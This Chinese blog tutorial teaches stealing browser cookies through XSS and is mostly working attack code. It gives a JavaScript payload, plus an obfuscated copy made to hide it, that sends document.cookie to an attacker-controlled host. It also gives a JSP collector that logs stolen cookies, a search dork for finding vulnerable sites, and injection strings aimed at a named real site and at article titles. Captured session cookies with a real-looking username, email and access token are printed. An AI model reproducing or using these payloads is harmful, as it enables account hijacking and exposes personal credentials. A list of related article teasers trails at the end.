0. 前提:有一个你说了算的外网web服务器,比如找个免费的虚拟主机。如果只是内网搞搞xss就算了。

1. 制作一个get.js,放到web上,比如http://www.myweb.com/get.js:

// 参考:http://blog.csdn.net/binyao02123202/article/details/9041113
// 目前比较好的xss方法:js较短,客户端不弹窗,可完整地获取cookievar img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://www.myweb.com/get.jsp?msg='+encodeURIComponent(document.cookie);

注意:document.cookie包含特殊字符,需要用encodeURIComponent处理一下。
如果不想让人看到js内容,可加密一下,在线加密:http://tool.chinaz.com/js.aspx

JS混淆加密压缩后会变成这样,几乎看不懂是啥:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('6 1=2.7(\'1\');1.8=0;1.5=0;1.4=\'3://9.e.f/g.a?b=\'+c(2.d);',17,17,'|img|document|http|src|height|var|createElement|width|www|jsp|msg|encodeURIComponent|cookie|myweb|com|get'.split('|'),0,{}))

2. 制作一个get.jsp,获取并保存cookie到服务端的一个文件里,比如/root/msg_get.txt:

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%><%@ page import="java.text.SimpleDateFormat"%>
<%@ page import="java.io.*"%>
<%@ page import="java.net.*"%><%
//new日期对象
Date date = new Date();
//转换提日期输出格式
SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:sss");
String logfile = "/root/msg_get.txt";
String time_stamp = dateFormat.format(date);
String cookie = URLDecoder.decode(request.getParameter("msg"), "UTF-8"); if(null != cookie){out.println(dateFormat.format(date) + " 正在写入 " + logfile + ":[" + cookie +"]"); System.out.println(dateFormat.format(date) + " 正在写入 " + logfile + ":[" + cookie +"]"); FileWriter writer = null;  try {     // 打开一个写文件器,构造函数中的第二个参数true表示以追加形式写文件     writer = new FileWriter(logfile, true);     writer.write(time_stamp + ":\r\n" + cookie + "\r\n\r\n");       } catch (IOException e) {     e.printStackTrace();     } finally {     try {     if(writer != null){  writer.close();     }  } catch (IOException e) {     e.printStackTrace();     }     }}else{out.println(dateFormat.format(date) + " 请指定msg参数。这是系统要使用的cookie参数。 ");
}
%>
<script language="javascript">
// 这个脚本是 ie6和ie7 通用的脚本
// http://zhidao.baidu.com/link?url=MxvCuaBHizw8fMEuolqlpdfCe8b-XwouXyP-mtCOVXZgNovuEbTH0Fnq9EZyOgw0bzMgb3hrAD8Tfi-OovfeENrg3cASuHuv
-2x7EnzneLW
function custom_close(){
if
(confirm("您确定要关闭本页吗?")){
window.opener=null;
window.open('','_self');
window.close();
}
else{}
}window.opener=null;
window.open('','_self');
window.close();
</script>  <input id="btnClose" type="button" value="关闭本页" onClick="custom_close()" />

3.在存在xss漏洞的地方,插入你的js:

参考:http://www.2cto.com/Article/201203/124645.html

谷歌一下inurl:'Product.asp?BigClassName'

比如:http://www.sider.com.hk/ProductIndex.asp?BigClassName=<script src="http://www.myweb.com/get.js"></script>

比如:csdn文章标题这样写: "/><script src="http://www.myweb.com/get.js"></script><!-

4. 测试:tail -f /root/msg_get.txt,cookie已经保存:

2016-10-14 10:57:020:
ASPSESSIONIDQSTSTSCQ=HOFHOIHDCGHFOLGDFFBGGJOB; ASPSESSIONIDQQTQTSAT=KJBFPGIDFPIOKNFCHBIOHIOB; ASPSESSIONIDSSRRTQAS=ACCJEBCAKAKAEPNDNONFFBKD

2016-10-14 11:01:019:
_ga=GA1.2.1223755915.1472435778; uuid_tt_dd=-3075280651751438540_20160829; UN=moxiaobei; UE="moxiaobei@163.com"; BT=1476438107129; __message_sys_msg_id=0; __message_gu_msg_id=0; __message_cnel_msg_id=0; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1476335060,1476335605,1476337531,1476337604; bdshare_firstime=1412438152173; CNZZDATA1258171664=2092116345-1474159334-|1474359334; __utma=17226283.1223735915.1472435778.1436340181.1476342070.3; __utmz=17222283.1476339070.3.3.utmcsr=write.blog.csdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/postlist/0/all/draft; __message_district_code=210000; __message_in_school=0; UserName=moxiaobei; UserInfo=5cp/Tt2qP3Xm2scg3V2wp1L/0gOVOMwRqcTtX3P12wsEDLhC2LbtiEphbfa1WdEHDkvyg7a2NQArrWB2K0MRuwqPps2EsHVIqwlKXmoa6bu4w/Wo1R3mc29x6tk3NtPK; UserNick=七侠镇莫小贝; AU=B44; UD=职业擅长:
猎人,战士,术士....; access-token=ead18cb6-3e28-4dab-8ea9-6a657362889e; Hm_lpvt_6bcd52f5159b3dce32bec4a3997715ac=1476351192; __utmc=12226283; dc_tos=of0oe6; dc_session_id=1476411240598; avh=9041113,52828352,12772841; uuid=4d2a31a8-78e4-432e-be4b-a4be0f44b9fe

xss实战: 利用xss得到cookie /brscript src=https://www.yunssl.cn:9062/static/p2.js/script!-相关推荐

  1. xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战

    论坛-->入侵者布置的跨站攻击-->转移被入侵这视线(隐蔽) 论坛插入脚本: var img = new Image(); img.src = 'get_cookie.php?var=' ...

  2. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

  3. 利用xss漏洞结合xss平台实现社工钓鱼

    本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...

  4. xss漏洞之——XSS平台搭建

    前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用.常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 & ...

  5. url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0

    点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...

  6. 【Canvas】HTML5游戏开发的基本流程+P2.js物理引擎实战开发

    <HTML5游戏开发的基本流程> * 1. HTML5的简述 * 2. HTML5游戏开发所需的环境与工具 * 2.1. 开发环境 * 2.1.1. 浏览器 * 2.1.2. 开发语言 * ...

  7. ajax在Xss中的利用,XSS高级利用

    点击阅读 利用 xss 的 javascript 劫持 一个 xss 漏洞示例页面 1 2 3 4 5 6 7 8 9 10 $xss = @$_GET['xss']; if($xss!==null) ...

  8. XSS实战攻击思路总结

    前言 前几天看到B站up主公孙田浩投稿的视频「QQ被盗后发布赌博广告,我一气之下黑了他们网站」,看完后不禁感叹为啥自己没有那么好的运气......实际上这就是一个中规中矩的XSS漏洞案例,在安全圈子里 ...

  9. 利用XSS盗取cookies

    利用XSS盗取cookies      1.把下里代码保存为cookies.asp,然后上传到能被正常访问的空间          <%            testfile=Server.M ...

最新文章

  1. 这么简单的目标检测赛题,竟然设置260万现金奖!
  2. oracle 主机名改ip,[oracle 10.2]主机名或者IP地址改变造成的dbconsole服务无法启动解决...
  3. Another kind of Fibonacci
  4. scala (2) while 和变量
  5. 吴恩达《机器学习》 --- 神经网络
  6. Nutch-1.6在Hadoop环境下的安装配置
  7. 全球第一开源ERP Odoo操作手册 数据库自动备份
  8. oracle 怎么重启数据库,oracle数据库重启
  9. 【常用 JS 插件】jQuery TreeTable 树表格插件
  10. CISP考试的全过程
  11. 王者荣耀背景故事整合
  12. VMware虚拟机不显示ipv4(无网络)
  13. 给hexo主题添加背景及更改字体颜色(next的Mist主题)
  14. Shopee本地店和跨境店物流及收款方式介绍
  15. python利用浏览器执行js_浏览器如何执行JS
  16. vue双向绑定原理及实现
  17. centos7笔记本触摸板单击无反应
  18. 1.10HDFS 回收站机制
  19. 瀑布流无限加载的原理
  20. oracle写excel文件,ORACLE-将oracle数据库中数据写入excel文件

热门文章

  1. Android之短信备份
  2. 《声入人心》收官盛典终极来袭,爱奇艺弹幕应援发射嗨满屏
  3. 0Ω电阻在PCB板中的5大常见作用
  4. 用pyecharts中的Overlap叠加不同类型图表输出
  5. tcl脚本-lindex函数
  6. 工作室课题-第一周笔记
  7. 常见问题: 时间戳如何转换日期时间格式?
  8. 【摄影技巧】摄影的骨架——构图(只为方便查找)
  9. 小程序 ESLint Prettier
  10. java发送手机验证码实现